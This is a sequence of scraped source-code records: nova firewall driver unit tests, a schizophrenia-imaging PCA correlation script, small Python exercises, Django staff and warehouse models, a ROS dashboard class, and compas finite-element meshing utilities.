_FN_ADD_FILTERS)\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter_recreate(self, i_rules_mock,\n add_filters_mock):\n\n i_mock = self.setup_instance_filter(i_rules_mock)\n # add rules when DHCP create is set and create the rule\n self.driver.dhcp_create = True\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n # Check we don't recreate the DHCP rules if we've already\n # done so (there is a dhcp_created flag on the driver that is\n # set when prepare_instance_filters() first creates them)\n self.driver.iptables.ipv4.__getitem__.reset_mock()\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n gi_mock = self.driver.iptables.ipv4.__getitem__.return_value\n self.assertFalse(gi_mock.called)\n\n def test_create_filter(self):\n filter = self.driver._create_filter(['myip', 'otherip'], 'mychain')\n self.assertEqual(filter, ['-d myip -j $mychain',\n '-d otherip -j $mychain'])\n\n def test_get_subnets(self):\n subnet1 = {'version': '1', 'foo': 1}\n subnet2 = {'version': '2', 'foo': 2}\n subnet3 = {'version': '1', 'foo': 3}\n network_info = [{'network': {'subnets': [subnet1, subnet2]}},\n {'network': {'subnets': [subnet3]}}]\n subnets = self.driver._get_subnets(network_info, '1')\n self.assertEqual(subnets, [subnet1, subnet3])\n\n def get_subnets_mock(self, network_info, version):\n if version == 4:\n return [{'ips': [{'address': '1.1.1.1'}, {'address': '2.2.2.2'}]}]\n if version == 6:\n return [{'ips': [{'address': '3.3.3.3'}]}]\n\n def create_filter_mock(self, ips, chain_name):\n if ips == ['1.1.1.1', '2.2.2.2']:\n return 'rule1'\n if ips == ['3.3.3.3']:\n return 'rule2'\n\n def test_filters_for_instance(self):\n self.flags(use_ipv6=True)\n chain_name = 'mychain'\n network_info = {'foo': 'bar'}\n self.driver._get_subnets = mock.Mock(side_effect=self.get_subnets_mock)\n self.driver._create_filter = \\\n mock.Mock(side_effect=self.create_filter_mock)\n\n ipv4_rules, ipv6_rules = \\\n self.driver._filters_for_instance(chain_name, network_info)\n\n self.assertEqual(self.driver._get_subnets.mock_calls,\n [mock.call(network_info, 4), mock.call(network_info, 6)])\n self.assertEqual(self.driver._create_filter.mock_calls,\n [mock.call(['1.1.1.1', '2.2.2.2'], chain_name),\n mock.call(['3.3.3.3'], chain_name)])\n self.assertEqual(ipv4_rules, 'rule1')\n self.assertEqual(ipv6_rules, 'rule2')\n\n def test_add_filters(self):\n self.flags(use_ipv6=True)\n self.driver.iptables.ipv4['filter'].add_rule = mock.Mock()\n self.driver.iptables.ipv6['filter'].add_rule = mock.Mock()\n chain_name = 'mychain'\n ipv4_rules = ['rule1', 'rule2']\n ipv6_rules = ['rule3', 'rule4']\n\n self.driver._add_filters(chain_name, ipv4_rules, ipv6_rules)\n\n self.assertEqual(self.driver.iptables.ipv4['filter'].add_rule.\n mock_calls, [mock.call(chain_name, 'rule1'),\n mock.call(chain_name, 'rule2')])\n self.assertEqual(self.driver.iptables.ipv6['filter'].add_rule.\n mock_calls, [mock.call(chain_name, 'rule3'),\n mock.call(chain_name, 'rule4')])\n\n @mock.patch.object(_IPT_DRIVER_CLS, '_instance_chain_name',\n return_value=mock.sentinel.mychain)\n @mock.patch.object(_IPT_DRIVER_CLS, '_filters_for_instance',\n return_value=[mock.sentinel.ipv4_rules,\n mock.sentinel.ipv6_rules])\n @mock.patch.object(_IPT_DRIVER_CLS, '_add_filters')\n def test_add_filters_for_instance(self, add_filters_mock,\n ffi_mock, icn_mock):\n self.flags(use_ipv6=True)\n with mock.patch.object(self.driver.iptables.ipv6['filter'],\n 'add_chain') as ipv6_add_chain_mock, \\\n mock.patch.object(self.driver.iptables.ipv4['filter'],\n 'add_chain') as ipv4_add_chain_mock:\n\n self.driver.add_filters_for_instance(\n mock.sentinel.instance,\n mock.sentinel.network_info,\n mock.sentinel.inst_ipv4_rules,\n mock.sentinel.inst_ipv6_rules)\n ipv4_add_chain_mock.assert_called_with(mock.sentinel.mychain)\n ipv6_add_chain_mock.assert_called_with(mock.sentinel.mychain)\n icn_mock.assert_called_with(mock.sentinel.instance)\n ffi_mock.assert_called_with(mock.sentinel.mychain,\n mock.sentinel.network_info)\n self.assertEqual([mock.call('local',\n mock.sentinel.ipv4_rules,\n mock.sentinel.ipv6_rules),\n mock.call(mock.sentinel.mychain,\n mock.sentinel.inst_ipv4_rules,\n mock.sentinel.inst_ipv6_rules)],\n add_filters_mock.mock_calls)\n\n def test_remove_filters_for_instance(self):\n self.flags(use_ipv6=True)\n self.driver._instance_chain_name = \\\n mock.Mock(return_value='mychainname')\n self.driver.iptables.ipv4['filter'].remove_chain = mock.Mock()\n self.driver.iptables.ipv6['filter'].remove_chain = mock.Mock()\n\n self.driver.remove_filters_for_instance('myinstance')\n\n self.driver._instance_chain_name.assert_called_with('myinstance')\n self.driver.iptables.ipv4['filter'].remove_chain.assert_called_with(\n 'mychainname')\n self.driver.iptables.ipv6['filter'].remove_chain.assert_called_with(\n 'mychainname')\n\n def test_instance_chain_name(self):\n instance = mock.Mock()\n instance.id = \"myinstanceid\"\n instance_chain_name = self.driver._instance_chain_name(instance)\n self.assertEqual(instance_chain_name, 'inst-myinstanceid')\n","sub_path":"nova/tests/unit/virt/test_firewall.py","file_name":"test_firewall.py","file_ext":"py","file_size_in_byte":12191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118064606","text":"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport pandas as pd\nimport nibabel as nib\nimport json\nfrom nilearn import plotting\nfrom nilearn import image\n\n################\n# Input/Output #\n################\n\nINPUT_BASE_DIR = '/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/results/pcatv'\nINPUT_DIR = os.path.join(INPUT_BASE_DIR,\"5_folds_NUDAST\",\"results\")\nINPUT_MASK = '/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/data/mask.nii' \n\n\nINPUT_CLINIC_FILENAME = \"/neurospin/abide/schizConnect/data/schizconnect_NUSDAST_assessmentData_1829.csv\"\nINPUT_POPULATION = \"/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/population.csv\"\n\n\n\n#PROBLEME multiple scores for each subject!!\nclinic = pd.read_csv(INPUT_CLINIC_FILENAME)\npop = pd.read_csv(INPUT_POPULATION)\npop[\"SAPS\"] = \"NaN\"\npop[\"SANS\"] = \"NaN\"\nfor s in pop.subjectid:\n print (s)\n curr = clinic[clinic.subjectid ==s]\n most_recent_visit = curr.visit.unique()[-1]\n curr = curr[curr.visit == most_recent_visit]\n current_SAPS = curr[curr.assessment_description == \"Scale for the Assessment of Positive Symptoms\"].question_value.astype(np.int64).values\n current_SANS = curr[curr.assessment_description == \"Scale for the Assessment of Negative Symptoms\"].question_value.astype(np.int64).values \n if len(current_SANS) != 0:\n pop.loc[pop.subjectid ==s,\"SAPS\"] = current_SAPS.sum()\n print (current_SAPS.sum())\n if len(current_SAPS) != 0: \n pop.loc[pop.subjectid ==s,\"SANS\"] = current_SANS.sum()\n \n\n \n#investigate distribution of SAPS and SANS scores across SCZ population \nSAPS_scores = pop[pop.dx_num ==1].SAPS.astype(np.float).values\nSANS_scores = pop[pop.dx_num ==1].SANS.astype(np.float).values \n\n\nscores_PCA_path = \"/neurospin/brainomics/2016_schizConnect/analysis/NUSDAST/VBM/results/pcatv/5_folds_NUDAST/results/0/struct_pca_0.1_0.5_0.8/X_train_transform.npz\"\nscores_comp = np.load(scores_PCA_path)['arr_0']\n\n#Pearson correlation\npearsonr(scores_comp[:,0],SAPS_scores)\npearsonr(scores_comp[:,0],SANS_scores)\n\npearsonr(scores_comp[:,1],SAPS_scores)\npearsonr(scores_comp[:,1],SANS_scores)\n\npearsonr(scores_comp[:,2],SAPS_scores)\npearsonr(scores_comp[:,2],SANS_scores)\n\npearsonr(scores_comp[:,3],SAPS_scores)\npearsonr(scores_comp[:,3],SANS_scores)\n\npearsonr(scores_comp[:,4],SAPS_scores)\npearsonr(scores_comp[:,4],SANS_scores)\n\n\n#COMPONENT 1\nplt.plot(scores_comp[:,0],SAPS_scores,'o')\nplt.xlabel('Score on component 1')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.09\",fontsize=12)\n\nplt.plot(scores_comp[:,0],SANS_scores,'o')\nplt.xlabel('Score on component 1')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.01\",fontsize=12)\n\n#COMPONENT 1\nplt.plot(scores_comp[:,1],SAPS_scores,'o')\nplt.xlabel('Score on component 2')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.09\",fontsize=12)\n\nplt.plot(scores_comp[:,1],SANS_scores,'o')\nplt.xlabel('Score on component 2')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.03\",fontsize=12)\n\n\n#COMPONENT 3\nplt.plot(scores_comp[:,2],SAPS_scores,'o')\nplt.xlabel('Score on component 3')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.067\",fontsize=12)\n\nplt.plot(scores_comp[:,2],SANS_scores,'o')\nplt.xlabel('Score on component 3')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.11\",fontsize=12)\n\n\n#COMPONENT 4\nplt.plot(scores_comp[:,3],SAPS_scores,'o')\nplt.xlabel('Score on component 4')\nplt.ylabel('SAPS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.017\",fontsize=12)\n\nplt.plot(scores_comp[:,3],SANS_scores,'o')\nplt.xlabel('Score on component 4')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = 0.04\",fontsize=12)\n\n\n\n#COMPONENT 4\nplt.plot(scores_comp[:,4],SAPS_scores,'o')\nplt.xlabel('Score on component 5')\nplt.ylabel('SAPS score')\nplt.text(-0.15,74,\"Pearson's correlation = 0.18, p = 0.04\",fontsize=12)\n\nplt.plot(scores_comp[:,4],SANS_scores,'o')\nplt.xlabel('Score on component 5')\nplt.ylabel('SANS score')\nplt.text(-0.05,74,\"Pearson's correlation = -0.02\",fontsize=12)\n\n\n","sub_path":"2016_schizConnect/unsupervised analysis/NUSDAST/50yo_scripts/pcatv_components_analysis_NUDAST.py","file_name":"pcatv_components_analysis_NUDAST.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"438332919","text":"# li = [(1, 2, 3), (4, 5, 6), (7, 8, 9)]\n# result = ''.join([j for i in li for j in i])\n# print(result)\n# li=[2000,20001,20003]\n# result={i:('yes'if i%100==0 & i%4==0 else 'no') for i in li }\n#\n# n = 10\n# result = [i for i in range(1, n + 1) if all(i % j != 0 for j in range(2, i))]\n# print(result)\n\nlist1 = [i for i in range(1, 10) for j in range(2, i) if i % j == 0 and i != j]\nresult = [i for i in range(1, 10) if i not in list1]\nprint(result)\n","sub_path":"practice/comprehension_practice.py","file_name":"comprehension_practice.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7233325","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\n# Iterative\r\nclass Solution(object):\r\n def levelOrder(self, root):\r\n \"\"\"\r\n :type root: TreeNode\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n queue = [(root, 0)]\r\n last_level = 0\r\n result = []\r\n level = []\r\n while len(queue):\r\n node = queue[0]\r\n del queue[0]\r\n if node[0] is None:\r\n continue\r\n if last_level == node[1]:\r\n level.append(node[0].val)\r\n else:\r\n result.append(level)\r\n level = [node[0].val]\r\n last_level = node[1]\r\n queue.extend([(node[0].left, node[1]+1), (node[0].right, node[1]+1)])\r\n if level:\r\n result.append(level)\r\n return result\r\n \r\n \r\n# Recursive\r\nclass Solution(object):\r\n result = []\r\n \r\n def levelOrder(self, root):\r\n \"\"\"\r\n :type root: TreeNode\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n if root is None:\r\n return []\r\n self.result = []\r\n self.traversal(root, 0)\r\n return self.result\r\n \r\n def traversal(self, node, level):\r\n if len(self.result) <= level:\r\n self.result.append([node.val])\r\n else:\r\n self.result[level].append(node.val)\r\n if node.left:\r\n self.traversal(node.left, level+1)\r\n if node.right:\r\n self.traversal(node.right, level+1)","sub_path":"src/102_BinaryTreeLevelOrderTraversal.py","file_name":"102_BinaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152735326","text":"from django.db import models\n\n\n# ====================权限相关==================================\n# 权限\nclass Permissions(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n permissions_name = models.FileField(max_length=12, unique=True, verbose_name='权限名称')\n permissions_url = models.FileField(max_length=100, unique=True, verbose_name='权限url')\n permissions_url_function = models.FileField(max_length=100, unique=True, verbose_name='权限url职能')\n\n\n# ==============人事相关========================================\n# 部门表\nclass Department(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n name = models.FileField(max_length=12, unique=True, blank=True, verbose_name='部门名称')\n department_and_permissions = models.ManyToManyField(to=\"Permissions\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='权限与部门多对多关系')\n\n\n# 员工\nclass Staff(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n staff_info = models.OneToOneField(to='StaffInfo', to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='员工与员工详情一对一关系')\n department_and_staff = models.ManyToManyField(to=\"Department\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='员工与部门多对多关系')\n staff_and_permissions = models.ManyToManyField(to=\"Permissions\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='权限与员工多对多关系')\n\n\n# 员工信息\nclass StaffInfo(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n work_number = models.FileField(max_length=12, unique=True, verbose_name='工号')\n password = models.FileField(max_length=12, verbose_name='密码')\n staff_name = models.FileField(max_length=10, verbose_name='员工姓名')\n staff_age = models.FileField(max_length=10, verbose_name='员工年龄')\n staff_gender = models.FileField(max_length=10, verbose_name='员工性别')\n staff_position = models.FileField(max_length=10, verbose_name='员工职位')\n staff_state = models.FileField(max_length=10, choices=((1, '在职'), (2, '办理离职中'), (3, '离职')), verbose_name='员工状态')\n staff_date_birth = models.DateTimeField(verbose_name='员工出生日期')\n staff_induction_date = models.DateTimeField(verbose_name='员工入职时间')\n staff_departure_date = models.DateTimeField(verbose_name='员工离职职时间', blank=True)\n staff_phone = models.FileField(max_length=12, verbose_name='员工联系电话')\n staff_emergency_phone = models.FileField(max_length=12, verbose_name='员工紧急联系电话')\n staff_email = models.EmailField(max_length=20, verbose_name='员工邮箱')\n staff_contract_no = models.EmailField(max_length=20, verbose_name='员工合同编号')\n staff_contract_deadline_date = models.DateTimeField(verbose_name='员工合同截止日期')\n\n\n# 预约表\nclass Appointment(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n appointment_people = models.FileField(max_length=12, verbose_name='预约人')\n appointment_people_iphone = models.FileField(max_length=12, verbose_name='预约人电话')\n being_appointment_people = models.ManyToManyField(to=\"Staff\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='被预约人')\n appointment_date = models.DateTimeField(verbose_name='预约时间')\n apply_date = models.DateTimeField(verbose_name='预约申请时间')\n note = models.FileField(max_length=100, verbose_name='备注')\n\n\n# ==================仓库=======================================\n# 物品类别\nclass Item_Category(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n category_name = models.CharField(max_length=12, unique=True, verbose_name='物品类别名称')\n\n def __str__(self):\n return self.category_name\n\n\n# 物品表\nclass Items(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n item_name = models.CharField(max_length=21, unique=True, verbose_name='物品名称')\n # 物品表与类别表多对多关系表\n items_and_category = models.ManyToManyField(to=\"Item_Category\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='物品与类别多对多关系')\n\n def __str__(self):\n return self.item_name\n\n\n# 物品详情表\nclass Item_Details(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n items = models.ForeignKey(to=\"Items\", to_field=\"id\", on_delete=models.CASCADE, verbose_name='物品与物品详情一对多关系')\n item_type = models.CharField(max_length=50, verbose_name='物品型号')\n items_manufacturer = models.CharField(max_length=50, verbose_name='物品厂家', blank=True)\n production_date = models.DateTimeField(verbose_name='生产日期', blank=True)\n period_validity = models.IntegerField(verbose_name='有效期', blank=True)\n quantity = models.IntegerField(verbose_name='数量')\n unit_price = models.FloatField(verbose_name='单价')\n state = models.CharField(max_length=10, verbose_name='状态')\n\n\n# 出库记录表\nclass OutStore(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n out_storage_quantity = models.IntegerField(verbose_name='数量')\n out_storage_time = models.DateTimeField(verbose_name='出库时间', blank=True)\n # 物品详情表与出库表多对多关系表\n out_storage_items = models.ManyToManyField(to=\"Item_Details\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='物品与出库多对多关系')\n get_user = models.ManyToManyField(to=\"Staff\", to_field=\"id\", on_delete=models.CASCADE, verbose_name='物品与领取人多对多关系')\n out_storage_user = models.ManyToManyField(to=\"Staff\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='物品与出库人多对多关系')\n out_storage_note = models.FileField(max_length=20, verbose_name='物品出库备注')\n\n\n# 入库记录表\nclass PutStore(models.Model):\n id = models.AutoField(primary_key=True, verbose_name='主键')\n # 物品详情表与入库表多对多关系表\n out_storage_items = models.ManyToManyField(to=\"Item_Details\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='物品与入库多对多关系')\n put_storage_time = models.DateTimeField(verbose_name='入库时间', blank=True)\n procurement = models.ManyToManyField(to=\"Staff\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='采购人或还物品人多对多关系')\n warehouse_people = models.ManyToManyField(to=\"Staff\", to_field=\"id\", on_delete=models.CASCADE,\n verbose_name='入库人与物品多对多关系')\n put_storage_note = models.FileField(max_length=20, verbose_name='物品入库备注', blank=True)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418880262","text":"#******************************************************\r\n#Program Name: slide26.py\r\n#Programmer: Gabriela Tolosa Ramirez\r\n#CSC - 119: Fall 2018 - 002\r\n#Date: Nov 5,2018\r\n#Purpose: Manipulate 2D list\r\n#Modules used: None\r\n#Input Variable(s): None\r\n#Output(s): myList\r\n#******************************************************\r\n\r\n## squares the values of a given list\r\n# @parm theList indicating the list being squared\r\n# @return sqList\r\ndef squares(theList):\r\n sqList = list(theList)\r\n for i in range(len(sqList)):\r\n sqList[i] = sqList[i]*sqList[i]\r\n return sqList\r\n\r\ndef main():\r\n myList = [\r\n [1,1,1],\r\n [1,1,1],\r\n [1,1,1,]\r\n ]\r\n\r\n #from slide\r\n for i in range(len(myList[2])):\r\n myList[2][i] = myList[2][i]+5\r\n print (myList)\r\n\r\n #changed first row to all zeros\r\n for i in range(len(myList[0])):\r\n myList[0][i] = 0\r\n print(myList)\r\n\r\n #change second row to be [1,2,3]\r\n x = 0\r\n for i in range(len(myList[1])):\r\n x+=1\r\n myList[1][i] = x\r\n print(myList)\r\n\r\n #add a fourth row that is [0,1,2]\r\n newList = [0,1,2]\r\n myList.append(newList)\r\n print(myList)\r\n\r\n #add a fifth row that is the squares of row 2\r\n newList = squares(myList[1])\r\n myList.append(newList)\r\n print(myList)\r\n\r\n #print 2D\r\n row = 5\r\n column = 3\r\n for i in range(row):\r\n for j in range(column):\r\n print(\"%10d\"%(myList[i][j]),end=\"\")\r\n print()\r\n\r\n\r\nmain()\r\n","sub_path":"In-Class work/Day 11/slide26.py","file_name":"slide26.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571210884","text":"#!/usr/bin/env python\n\nfrom hrpsys_ros_bridge.hrpsys_dashboard import HrpsysDashboard\nfrom rqt_robot_dashboard.widgets import MenuDashWidget\n\nfrom python_qt_binding.QtGui import QMessageBox, QLabel, QPalette\n\nimport os\nclass HiroNXNameLabel(QLabel):\n def __init__(self, name):\n super(HiroNXNameLabel, self).__init__()\n palette = QPalette()\n self.setStyleSheet('font-size: larger; font-weight: bold; color: #ffffff; background-color: darkgreen;')\n self.setText(name)\n\nclass HiroNXDashboard(HrpsysDashboard):\n def setup(self, context):\n super(HiroNXDashboard, self).setup(context)\n self.name = \"HiroNX dashboard\"\n self._imp_button = None\n self._pose_button = None\n self._name_label = HiroNXNameLabel(\"HiroNX \"+os.environ[\"ROS_MASTER_URI\"]+\" \")\n\n def get_widgets(self):\n widgets = super(HiroNXDashboard, self).get_widgets()\n widgets.append([self._name_label])\n return widgets\n","sub_path":"hironx_ros_bridge/src/hironx_ros_bridge/hironx_dashboard.py","file_name":"hironx_dashboard.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"292667507","text":"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nfrom compas.topology import dijkstra_path\r\n\r\nfrom compas.geometry import add_vectors\r\nfrom compas.geometry import angles_points_xy\r\nfrom compas.geometry import area_polygon_xy\r\nfrom compas.geometry import centroid_points\r\nfrom compas.geometry import circle_from_points_xy\r\nfrom compas.geometry import cross_vectors\r\nfrom compas.geometry import distance_point_point\r\nfrom compas.geometry import length_vector\r\nfrom compas.geometry import normalize_vector\r\nfrom compas.geometry import scale_vector\r\nfrom compas.geometry import subtract_vectors\r\n\r\nfrom compas.utilities import geometric_key\r\n\r\nfrom time import time\r\n\r\ntry:\r\n from numpy import abs\r\n from numpy import arctan2\r\n from numpy import array\r\n from numpy import asarray\r\n from numpy import cos\r\n from numpy import dot\r\n from numpy import hstack\r\n from numpy import isnan\r\n from numpy import linspace\r\n from numpy import meshgrid\r\n from numpy import min\r\n from numpy import max\r\n from numpy import newaxis\r\n from numpy import pi\r\n from numpy import sin\r\n from numpy import squeeze\r\n from numpy import sum\r\n from numpy import tile\r\n from numpy import vstack\r\n from numpy import zeros\r\n from numpy.linalg import inv\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from scipy.interpolate import griddata\r\n from scipy.sparse import csr_matrix\r\n from scipy.spatial import Delaunay\r\n from scipy.spatial import distance_matrix\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from compas.viewers import VtkVoxels\r\nexcept ImportError:\r\n pass\r\n\r\ntry:\r\n from meshpy.tet import build\r\n from meshpy.tet import MeshInfo\r\nexcept ImportError:\r\n pass\r\n\r\n\r\n__author__ = ['Andrew Liew ', 'Tomas Mendez ']\r\n__copyright__ = 'Copyright 2018, BLOCK Research Group - ETH Zurich'\r\n__license__ = 'MIT License'\r\n__email__ = 'liew@arch.ethz.ch'\r\n\r\n\r\n__all__ = [\r\n 'colorbar',\r\n 'combine_all_sets',\r\n 'discretise_faces',\r\n 'extrude_mesh',\r\n 'group_keys_by_attribute',\r\n 'group_keys_by_attributes',\r\n 'network_order',\r\n 'normalise_data',\r\n 'postprocess',\r\n 'process_data',\r\n 'tets_from_vertices_faces',\r\n 'principal_stresses',\r\n 'plotvoxels',\r\n]\r\n\r\n\r\ndef colorbar(fsc, input='array', type=255):\r\n\r\n \"\"\" Creates RGB color information from -1 to 1 scaled values.\r\n\r\n Parameters\r\n ----------\r\n fsc : array, float\r\n (n x 1) array of scaled data, or a single float value.\r\n input : str\r\n Input given as an 'array' of numbers or a 'float'.\r\n type : int\r\n RGB as 255 or 1 scaled.\r\n\r\n Returns\r\n -------\r\n array, list\r\n (n x 3) array of RGB values or single RGB list.\r\n\r\n \"\"\"\r\n\r\n r = +abs(fsc + 0.25) * 2 - 0.5\r\n g = -abs(fsc - 0.25) * 2 + 1.5\r\n b = -(fsc - 0.25) * 2\r\n\r\n if input == 'array':\r\n rgb = hstack([r, g, b])\r\n rgb[rgb > 1] = 1\r\n rgb[rgb < 0] = 0\r\n return rgb * type\r\n\r\n elif input == 'float':\r\n r = max([0, min([1, r])])\r\n g = max([0, min([1, g])])\r\n b = max([0, min([1, b])])\r\n return [i * type for i in [r, g, b]]\r\n\r\n\r\ndef combine_all_sets(sets_a, sets_b):\r\n\r\n \"\"\" Combines two nested lists of node or element sets into the minimum ammount of set combinations.\r\n\r\n Parameters\r\n ----------\r\n sets_a : list\r\n First nested list containing lists of element or node keys.\r\n sets_b : list\r\n Second nested list containing lists of element or node keys.\r\n\r\n Returns\r\n -------\r\n dic\r\n A dictionary containing the minimum number of set combinations.\r\n\r\n \"\"\"\r\n\r\n comb = {}\r\n for i in sets_a:\r\n for j in sets_b:\r\n for x in sets_a[i]:\r\n if x in sets_b[j]:\r\n comb.setdefault(str(i) + ',' + str(j), []).append(x)\r\n return comb\r\n\r\n\r\ndef discretise_faces(vertices, faces, target, min_angle=15, factor=3, iterations=100, refine=True):\r\n\r\n \"\"\" Make an FE mesh from input coarse mesh data.\r\n\r\n Parameters\r\n ----------\r\n vertices : list\r\n Co-ordinates of coarse mesh vertices.\r\n faces : list\r\n Vertex numbers of each face of the coarse mesh.\r\n target : float\r\n Target length of each triangle.\r\n min_angle : float\r\n Minimum internal angle of triangles.\r\n factor : float\r\n Factor on the maximum area of each triangle.\r\n iterations : int\r\n Number of iterations per face.\r\n refine : bool\r\n Refine beyond Delaunay.\r\n\r\n Returns\r\n -------\r\n list\r\n Vertices of discretised faces.\r\n list\r\n Triangles of discretised faces.\r\n\r\n \"\"\"\r\n\r\n points_all = []\r\n faces_all = []\r\n\r\n Amax = factor * 0.5 * target**2\r\n\r\n for count, face in enumerate(faces):\r\n print('Face {0}/{1}'.format(count + 1, len(faces)))\r\n\r\n # Seed\r\n\r\n face.append(face[0])\r\n points = []\r\n for u, v in zip(face[:-1], face[1:]):\r\n sp = vertices[u]\r\n ep = vertices[v]\r\n vec = subtract_vectors(ep, sp)\r\n l = length_vector(vec)\r\n n = max([1, int(l / target)])\r\n for j in range(n):\r\n points.append(add_vectors(sp, scale_vector(vec, j / n)))\r\n\r\n # Starting orientation\r\n\r\n centroid = centroid_points(points)\r\n vec1 = subtract_vectors(points[1], points[0])\r\n vecc = subtract_vectors(centroid, points[0])\r\n vecn = cross_vectors(vec1, vecc)\r\n\r\n # Rotate about x\r\n\r\n points = array(points).transpose()\r\n phi = -arctan2(vecn[2], vecn[1]) + pi / 2\r\n Rx = array([[1., 0., 0.], [0., cos(phi), -sin(phi)], [0., sin(phi), cos(phi)]])\r\n vecn_x = dot(Rx, array(vecn)[:, newaxis])\r\n points_x = dot(Rx, points)\r\n Rxinv = inv(Rx)\r\n\r\n # Rotate about y\r\n\r\n psi = +arctan2(vecn_x[2, 0], vecn_x[0, 0]) - pi / 2\r\n Ry = array([[cos(psi), 0., sin(psi)], [0., 1., 0.], [-sin(psi), 0., cos(psi)]])\r\n points_y = dot(Ry, points_x)\r\n Ryinv = inv(Ry)\r\n\r\n # Store\r\n\r\n Vs = points_y.transpose()\r\n DTs = Delaunay(Vs[:, :2], furthest_site=False, incremental=False)\r\n tris = DTs.simplices\r\n points_xs = dot(Ryinv, Vs.transpose())\r\n points_new = [list(i) for i in list(dot(Rxinv, points_xs).transpose())]\r\n faces_new = [[int(i) for i in tri] for tri in list(tris)]\r\n\r\n # Refine\r\n\r\n if refine:\r\n\r\n V = points_y.transpose()\r\n z = float(V[0, 2])\r\n\r\n it = 0\r\n while it < iterations:\r\n DT = Delaunay(V[:, :2], furthest_site=False, incremental=False)\r\n tris = DT.simplices\r\n for u, v, w in tris:\r\n p1 = [float(i) for i in V[u, :2]]\r\n p2 = [float(i) for i in V[v, :2]]\r\n p3 = [float(i) for i in V[w, :2]]\r\n # th1 = angles_points_xy(p1, p2, p3)[0] * 180 / pi\r\n # th2 = angles_points_xy(p2, p3, p1)[0] * 180 / pi\r\n # th3 = angles_points_xy(p3, p1, p2)[0] * 180 / pi\r\n # print(th1, th2, th3) ] leads to some 0 and 180\r\n # thm = min([th1, th2, th3])\r\n res = circle_from_points_xy(p1, p2, p3)\r\n if res:\r\n c, r, _ = res\r\n c[2] = z\r\n A = area_polygon_xy([p1, p2, p3])\r\n # if (thm < min_angle) or (A > Amax):\r\n if A > Amax:\r\n dist = distance_matrix(array([c]), V, threshold=10**5)\r\n ins = len(dist[dist <= r])\r\n if ins <= 3:\r\n V = vstack([V, array([c])])\r\n break\r\n else:\r\n continue\r\n it += 1\r\n\r\n print('Iterations {0}'.format(it))\r\n\r\n points_x = dot(Ryinv, V.transpose())\r\n points_new = [list(i) for i in list(dot(Rxinv, points_x).transpose())]\r\n faces_new = [[int(i) for i in tri] for tri in list(tris)]\r\n\r\n points_all.append(points_new)\r\n faces_all.append(faces_new)\r\n\r\n return points_all, faces_all\r\n\r\n\r\ndef extrude_mesh(structure, mesh, layers, thickness, mesh_name, links_name, blocks_name):\r\n\r\n \"\"\" Extrudes a Mesh and adds/creates elements to a Structure.\r\n\r\n Parameters\r\n ----------\r\n structure : obj\r\n Structure object to update.\r\n mesh : obj\r\n Mesh datastructure\r\n layers : int\r\n Number of layers.\r\n thickness : float\r\n Layer thickness.\r\n mesh_name : str\r\n Name of set for mesh on final surface.\r\n links_name : str\r\n Name of set for adding links along extrusion.\r\n 